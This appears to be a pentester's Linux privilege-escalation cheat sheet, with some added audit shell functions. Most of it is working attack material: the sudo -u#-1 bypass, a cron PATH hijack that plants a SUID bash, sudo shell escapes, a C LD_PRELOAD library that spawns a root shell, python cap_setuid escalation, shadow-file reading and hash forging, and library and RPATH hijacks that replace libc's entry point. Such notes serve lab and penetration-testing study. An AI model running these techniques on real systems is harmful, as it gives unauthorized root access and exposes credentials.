Notes
PRIVILEGE ESCALATION
System information
(cat /proc/version || uname -a ) 2>/dev/null
lsb_release -a 2>/dev/null
echo $PATH
Environment variables
(env || set) 2>/dev/null
Kernel exploit
cat /proc/version
uname -a
searchsploit "Linux Kernel"
Example searchsploit hits for old kernels: Linux Kernel <= 3.19.0-73.8 local privilege escalation, and Dirty COW (CVE-2016-5195). Match the exact kernel version and distribution build before trusting an exploit.
Sudo version
searchsploit sudo
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
sudo < 1.8.28 (CVE-2019-14287): if sudoers lets you run a command as any user except root, e.g. (ALL, !root), the user id -1 (or 4294967295) is mapped to root:
sudo -u#-1 /bin/bash
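As an added check (my own, not part of the original notes), a small shell function that decides from the version string whether sudo falls in the range affected by CVE-2019-14287 (fixed in 1.8.28). It compares the components numerically instead of relying on the regex above, which misses 1.8.2 through 1.8.9. The function names are assumptions. The bug is only reachable when sudoers grants a Runas list that excludes root, such as (ALL, !root), so always read sudo -l as well.

```sh
# Added example: is this sudo version affected by CVE-2019-14287 (< 1.8.28)?
# Accepts strings like "1.8.27", "1.8.21p2", "1.9.5p2". Function names are mine.
sudo_vuln_cve_2019_14287() {
    ver=${1%%p*}                                   # "1.8.21p2" -> "1.8.21"
    major=$(printf '%s' "$ver" | cut -s -d. -f1)
    minor=$(printf '%s' "$ver" | cut -s -d. -f2)
    patch=$(printf '%s' "$ver" | cut -s -d. -f3)
    : "${major:=$ver}" "${minor:=0}" "${patch:=0}" # tolerate "1" or "1.8"
    # 1.0.x .. 1.7.x are affected, and so is 1.8.0 .. 1.8.27
    if [ "$major" -eq 1 ] && [ "$minor" -lt 8 ]; then return 0; fi
    if [ "$major" -eq 1 ] && [ "$minor" -eq 8 ] && [ "$patch" -lt 28 ]; then return 0; fi
    return 1
}

# Version string of the sudo on this box, e.g. "1.8.31" (empty if sudo is absent).
installed_sudo_version() {
    sudo -V 2>/dev/null | sed -n 's/^Sudo version //p'
}

# Usage: report, then go and check sudoers for a Runas list excluding root.
v=$(installed_sudo_version)
if [ -n "$v" ] && sudo_vuln_cve_2019_14287 "$v"; then
    echo "sudo $v is < 1.8.28: if 'sudo -l' shows (ALL, !root), try: sudo -u#-1 /bin/bash"
fi
```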
Processes
ps aux
ps -ef
top -n 1
Cron jobs (time-based)
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
Example: cron PATH
For example, inside /etc/crontab you can find the PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
(Note how the user "user" has write permission on /home/user, the first entry of that PATH.)
If inside this crontab root executes some command or script by bare name, without an absolute path, for example:
* * * * * root overwrite.sh
then cron resolves overwrite.sh through that PATH and finds your file first. You can get a root shell with:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh
- Wait for the cron job to run (one minute here), then execute /tmp/bash -p
- The -p flag is required: without it bash resets the effective uid and gid to the real uid and gid and drops the SUID privilege.
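To find this condition without reading every crontab by hand, here is an added shell function (my own, not from the original notes) that takes a system-format crontab file, reads its PATH= line, and reports every command invoked by bare name that would be resolved from a directory the current user can write to. It walks PATH left to right, the way sh does, so a writable directory that comes after the one holding the real binary is not reported. The cron_path_audit name and the constructed sample crontab are assumptions.

```sh
# Added example: report cron commands hijackable through a writable PATH dir.
# Input: a crontab in system format (min hour dom mon dow user command).
# Output lines: "<writable dir>|<bare command>". Function name is mine.
cron_path_audit() {
    crontab_file="$1"
    # PATH as set in the file; cron's default when none is given
    cron_path=$(sed -n 's/^PATH=//p' "$crontab_file" | tail -n 1)
    [ -n "$cron_path" ] || cron_path="/usr/bin:/bin"

    # Skip comments, blank lines and VAR=value lines; the command is field 7,
    # or field 3 for @reboot/@daily style entries. Keep only bare names.
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$crontab_file" \
      | awk '$1 ~ /^@/ {print $3; next} {print $7}' \
      | grep -v '/' | sort -u \
      | while read -r cmd; do
            [ -n "$cmd" ] || continue
            # Walk PATH in order, exactly as the shell resolving the name would
            for dir in $(printf '%s' "$cron_path" | tr ':' ' '); do
                if [ -w "$dir" ]; then
                    echo "$dir|$cmd"; break
                elif [ -x "$dir/$cmd" ]; then
                    break        # real binary found first: later dirs don't matter
                fi
            done
        done
    return 0
}

# Usage on a live system (output is empty when nothing is hijackable):
#   cron_path_audit /etc/crontab
#   for f in /etc/cron.d/*; do cron_path_audit "$f"; done
```

Jobs that already use an absolute path are ignored, which is what you want: those are only attackable if the target file or its directory is itself writable.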
Services
systemd timers
systemctl show-environment
List all timers (active and inactive)
systemctl list-timers --all
If you have write permission on a .timer unit, or on the .service it activates, you can modify it to execute your own commands.
If you can modify a timer you can make it activate any existing systemd unit (a .service or a .target) by pointing its Unit= line at it:
Unit=backdoor.service
To enable a timer (requires privileges to manage units):
sudo systemctl enable backu2.timer
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
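A companion check for this section (added here, not from the original notes): given a directory of unit files, resolve each .timer to the unit it activates (its Unit= line, or the .service of the same name when absent), take the first word of that service's ExecStart=, and report whichever of the three files is writable by the current user. Any of them gives code execution in the service's context the next time the timer fires. The timer_audit name and the sample units are assumptions.

```sh
# Added example: find timer -> service -> ExecStart chains that the current
# user can modify. Output: "<what>|<path>". Function name is mine.
timer_audit() {
    unit_dir="$1"
    for timer in "$unit_dir"/*.timer; do
        [ -e "$timer" ] || continue
        name=$(basename "$timer" .timer)
        # Unit= names the activated unit; systemd defaults to <name>.service
        svc=$(sed -n 's/^Unit=//p' "$timer" | tail -n 1)
        [ -n "$svc" ] || svc="$name.service"
        svc_file="$unit_dir/$svc"
        # First word of ExecStart, after systemd's optional prefix chars (- @ + ! :)
        exec_bin=$(sed -n 's/^ExecStart=[-@+!:]*//p' "$svc_file" 2>/dev/null \
                   | tail -n 1 | awk '{print $1}')
        if [ -w "$timer" ]; then echo "timer-writable|$timer"; fi
        if [ -w "$svc_file" ]; then echo "service-writable|$svc_file"; fi
        if [ -n "$exec_bin" ] && [ -w "$exec_bin" ]; then echo "exec-writable|$exec_bin"; fi
    done
    return 0
}

# Usage on a live system:
#   timer_audit /etc/systemd/system
#   timer_audit /lib/systemd/system
```

Run it against every directory systemd loads units from; a writable ExecStart target is the quiet option, since the unit files themselves stay untouched.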
Network enumeration
- Hostname, hosts and DNS
cat /etc/hostname /etc/hosts /etc/resolv.conf
dnsdomainname
- Content of /etc/inetd.conf & /etc/xinetd.conf
cat /etc/inetd.conf /etc/xinetd.conf
- Interfaces
cat /etc/networks
(ifconfig || ip a)
- Neighbours
(arp -e || arp -a)
(route || ip n)
- Iptables rules
(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null)
- Files used by network services
lsof -i
Puertos abiertos
(netstat -punta || ss --ntpu)
(netstat -punta || ss --ntpu) | grep "127.0"
Sniff network traffic briefly
timeout 1 tcpdump
User enumeration
- Info about me
id || (whoami && groups) 2>/dev/null
- List all users
cat /etc/passwd | cut -d: -f1
- List users with console
cat /etc/passwd | grep "sh$"
- List superusers
awk -F: '($3 == "0") {print}' /etc/passwd
- Currently logged users
w
- Login history
last | tail
- Last log of each user
lastlog
- List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort
- Current user PGP keys
gpg --list-keys 2>/dev/null
SUID binaries and sudo rights
sudo -l
- Check which commands the current user may run with sudo
find / -perm -4000 2>/dev/null
- Find all binaries with the SUID bit: they run with the privileges of the file owner, not of the caller
Shell escapes usable through sudo or a SUID copy of the binary:
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh    # -z runs ./runme.sh after each 1-second rotation
sudo tar c a.tar -I ./runme.sh a                          # -I runs ./runme.sh as the compression program
ftp> !/bin/sh               # from an interactive ftp prompt
less: !<shell_command>      # from inside less
sudo -l with NOPASSWD
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
Running the allowed binary with sudo gives us its shell escape as the target user:
sudo vim -c '!sh'
and we get a root shell.
LD_PRELOAD
LD_PRELOAD is an optional environment variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library, including the C runtime library (libc.so). This is called preloading a library.
To avoid this mechanism being used as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.
If you find inside the output of sudo -l the sentence env_keep+=LD_PRELOAD and you can call some command with sudo, you can escalate privileges, because sudo then passes your LD_PRELOAD through to the root process instead of stripping it.
Defaults env_keep += LD_PRELOAD
Save as /tmp/pe.c:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs when the library is loaded, before main() of the sudo'ed command;
   -nostartfiles lets us supply _init ourselves. */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't preload ourselves into the child shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Then compile it using:
cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles
Finally, escalate privileges running (use the absolute path so the loader finds the library):
sudo LD_PRELOAD=/tmp/pe.so <COMMAND> #Use any command you can run with sudo
Capabilities
List file capabilities on the system:
getcap -r / 2>/dev/null
To add a capability (needs root; shown so you recognise the result):
setcap cap_setuid+ep /usr/bin/python2.7
/usr/bin/python2.7 = cap_setuid+ep
- Exploit: a binary with cap_setuid can switch itself to uid 0
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
Screen sessions
screen -ls
Attach to a session
screen -dr <session> #The -d detaches whoever is currently attached to it
screen -dr 3350.foo #Example session name as shown by screen -ls
List tmux sessions
tmux ls
ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess
Searching for passwords in /etc/passwd and /etc/shadow
- Passwd equivalent files
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
- Shadow equivalent files
cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null
Search for hashes stored directly in passwd-style files (second field that is neither x nor *):
grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
Create a password hash to add to /etc/shadow (or to the second field of /etc/passwd, if it is writable):
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Shared libraries
ldconfig
Identify the shared libraries a binary loads with ldd:
$ ldd /opt/binary
linux-vdso.so.1 (0x00007ffe961cd000)
vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)
If you can write to /etc/ld.so.conf.d/ (or to a directory already listed there), build a malicious library in /tmp, add that path to the loader configuration and register the library, then run the target:
gcc -Wall -fPIC -shared -o vulnlib.so /tmp/vulnlib.c
echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
/opt/binary
RPATH
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000f (RPATH) Library rpath: [/var/tmp/flag15]
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x0068c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x005bb000)
By copying the lib into /var/tmp/flag15/ it will be used by the program in this place as specified in the RPATH variable.
level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)
Then create an evil library in /var/tmp/flag15/ (where the RPATH points) with:
gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6
exploit.c replaces __libc_start_main, the libc entry point that calls main, so the program never reaches its own code (the version linker script referenced above is not reproduced in these notes):
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#define SHELL "/bin/sh"

int __libc_start_main(int (*main) (int, char **, char **), int argc, char **ubp_av,
                      void (*init) (void), void (*fini) (void),
                      void (*rtld_fini) (void), void (*stack_end))
{
    char *file = SHELL;
    char *argv[] = {SHELL, 0};
    /* make real, effective and saved uid equal to the SUID owner's so the shell keeps it */
    setresuid(geteuid(), geteuid(), geteuid());
    execve(file, argv, 0);
    return 0; /* only reached if execve fails */
}
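To hunt for both conditions above at scale (writable ld.so.conf directories, and RPATH/RUNPATH entries you control), here is an added shell helper, mine rather than from the original notes or the Nebula exercise. Feed it the output of readelf -d on a binary, or the lines of /etc/ld.so.conf and /etc/ld.so.conf.d/*.conf, and it reports each library directory the current user can write to, plus directories that do not exist yet but whose nearest existing ancestor is writable (the flag15 case: /var/tmp/flag15 can simply be created). $ORIGIN-relative entries are flagged for manual review since they depend on where the binary lives. Function names and sample input are assumptions.

```sh
# Added example: which library search directories can the current user
# control? Reads directory names from stdin, one per line. Names are mine.

# Classify one directory: writable, creatable (missing, but its nearest
# existing parent is writable), origin-relative, or silent when none applies.
report_lib_dir() {
    dir="$1"
    case "$dir" in
        *'$ORIGIN'*) echo "origin-relative|$dir"; return 0 ;;
    esac
    if [ -d "$dir" ]; then
        if [ -w "$dir" ]; then echo "writable|$dir"; fi
    else
        parent=$(dirname "$dir")
        while [ ! -e "$parent" ]; do parent=$(dirname "$parent"); done
        if [ -w "$parent" ]; then echo "creatable|$dir"; fi
    fi
    return 0
}

# From `readelf -d <binary>` output: split RPATH/RUNPATH entries on ':'
rpath_dirs_from_readelf() {
    sed -En 's/.*\((RPATH|RUNPATH)\).*\[([^]]*)\].*/\2/p' | tr ':' '\n' \
      | while read -r d; do
            if [ -n "$d" ]; then report_lib_dir "$d"; fi
        done
    return 0
}

# From ld.so.conf-style files: one directory per line; skip comments/include
ldconf_dirs() {
    grep -Ev '^[[:space:]]*(#|$|include[[:space:]])' \
      | while read -r d; do report_lib_dir "$d"; done
    return 0
}

# Usage on a live system:
#   readelf -d /opt/binary | rpath_dirs_from_readelf
#   cat /etc/ld.so.conf /etc/ld.so.conf.d/*.conf 2>/dev/null | ldconf_dirs
```

Combine the first usage line with the SUID search above (find / -perm -4000) to cover every SUID binary on the box; a creatable or writable hit against a SUID binary is a direct root path.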